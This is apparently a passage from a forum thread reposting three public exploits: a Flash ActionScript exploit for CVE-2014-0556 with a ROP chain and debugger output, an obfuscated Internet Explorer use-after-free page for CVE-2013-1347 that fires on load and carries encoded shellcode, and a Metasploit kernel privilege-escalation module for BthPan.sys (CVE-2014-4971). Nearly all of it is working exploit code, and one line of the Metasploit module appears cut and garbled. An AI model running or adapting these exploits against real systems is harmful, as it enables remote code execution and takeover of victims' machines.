800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) / 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } ============================================================================================================================= /* <html> <head> <title>CVE-2014-0556</title> </head> <body> <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br> <button onclick="swf.exploit()">STOP</button> </body> </html> */ /* (1728.eb0): Break instruction exception - code 80000003 (first chance) eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63048 cc int 3 1:020> dd esp l4 08d63048 cccccccc cccccccc cccccccc cccccccc 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d63049 cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304a cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984 eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304b cc int 3 1:020> t eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 
esi=599dd83f edi=59a31984 eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202 08d6304c cc int 3 */ package { import flash.events.* import flash.media.* import flash.display.* import flash.geom.* import flash.utils.* import flash.text.* import flash.external.ExternalInterface public class Main extends Sprite { private var i0:uint private var i1:uint private var i2:uint private var i3:uint private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145") private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200) private var ob:Vector.<Object> = new Vector.<Object>(6400) private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff) private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4) private var snd:Sound private var vector:uint private var vtable:uint private var flash:uint public function Main():void { for (i0 = 0; i0 < 3200; i0++) { ba[i0] = new ByteArray() ba[i0].length = 0x2000 ba[i0].position = 0xfffff000 } for (i0 = 0; i0 < 3200; i0++) { if (i0 % 2 == 0) ba[i0] = null ob[i0 * 2] = new Vector.<uint>(1008) ob[i0 * 2 + 1] = new Vector.<uint>(1008) } bitmap.copyPixelsToByteArray(rect, ba[1601]) for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break ob[i0][1024 * 3 - 2] = 0xffffffff for (i1 = 0; ; i1++) { if (i0 == i1) continue if (ob[i1].length != 1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) { vector = ob[i1][0xFFFFFFFF - i2 + 11] break } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) { vector = ob[i1][i2 + 11] break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue 
ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) 
                / 4 - 2] = data
            }
            private function read(addr:uint):uint
            {
                return ob[i0][(addr - vector) / 4 - 2]
            }
            private function zeroPad(number:String, width:int):String
            {
                if (number.length < width) return "0" + zeroPad(number, width-1)
                return number
            }
            public function exploit():void
            {
                snd.toString()
            }
        }
    }
    Source: [ActionScript 3] CVE-2014-0556 - Pastebin.com
  23. MSIE Use After Free EXP/CVE-2013-1347
    <!doctype html>
    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
    <head>
    <meta>
    <?IMPORT namespace="t" implementation="#default#time2">
    </meta>
    <script>
    pRESSURA = eval('unescape');
    fAHPARIC = CollectGarbage;
    dISCESA = '%u';
    function rIGUARDI(rEPLACEMENT) {
        return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
    }
    function vILMENTE(tRIPARTITO) {
        rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10));
        if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
        mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10));
        if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
        tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10));
        if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
        pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10));
        if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
        return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
    }
    function ue(dw) {
        return rIGUARDI(vILMENTE(dw));
    }
    function setc() {
        var Then = new Date()
        Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
        document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
    }
    function readc() {
        var cookieString = new String(document.cookie);
        if (cookieString.indexOf("fucktheothers") == -1) {
            return 0
        } else {
            return 1;
        }
    }
    function DropPayload() {
        // en = 77c10000
        // kr = 77bc0000
        // offset = 50000
        var r = "";
        r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll]
        r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll]
        r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll]
        r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
        for(i=0;i<=0x201;i++) {
            r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
        }
        r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll]
        r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx)
        r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
        r+=
ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll] r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll] r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll] r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll] r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll] r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll] r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll] r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll] r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll] r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll] return r; } function align_esp() { var r= ""; r += ue(0x77BFD801); return r; } function xchg_esp() { var r=""; r += ue(0x77BC5ED5); return r; } function helloWorld() { if (readc()) return; setc(); unicorn = unescape("ABCD"); unicorn2 = unescape("EEEE"); for (i=0; i < 2; i++) { unicorn += unescape("ABCD"); }unicorn += unescape("AB"); unicorn += DropPayload(); unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7
BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
  24. Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>'   # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'        =>
        [
          ['Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS' => "\x44",
              '_TOKEN' => "\xc8",
              '_UPID' => "\x84",
              '_APLINKS' => "\x88"
            }
          ]
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end

  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")

    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]

    print_status("Disclosing the HalDispatchTable address...")
    @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end

    print_good("Privilege escalation successful!")
    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end

Source: http://www.exploit-db.com/exploits/34982/